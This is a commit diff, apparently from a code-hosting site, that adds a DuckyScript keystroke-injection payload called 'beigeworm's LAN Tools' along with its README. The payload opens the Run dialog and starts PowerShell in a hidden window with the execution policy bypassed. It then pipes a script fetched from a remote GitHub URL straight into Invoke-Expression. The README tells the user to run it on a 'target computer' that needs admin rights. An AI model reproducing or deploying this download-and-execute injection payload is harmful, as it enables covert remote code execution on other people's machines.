Add files via upload
This commit is contained in:
@@ -0,0 +1,15 @@
|
||||
REM Title: beigeworm's LAN Tools
|
||||
REM Author: @beigeworm
|
||||
REM Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
|
||||
REM NOTE - This script will need Admin privileges to run properly.
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove "-W H" to show the window)
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex
|
||||
ENTER
|
||||
|
||||
@@ -0,0 +1,17 @@
|
||||
|
||||
<h2 align="center"> Beigeworm's Powershell LAN Toolset </h2>
|
||||
|
||||
MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN
|
||||
|
||||
SYNOPSIS
|
||||
|
||||
Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
|
||||
|
||||
USAGE
|
||||
|
||||
1. Run this script on target computer and note the URL provided
|
||||
2. on another device on the same network, enter the provided URL in a browser window
|
||||
|
||||
NOTE
|
||||
|
||||
This script will need Admin privaleges to run properly.
|
||||
Reference in New Issue
Block a user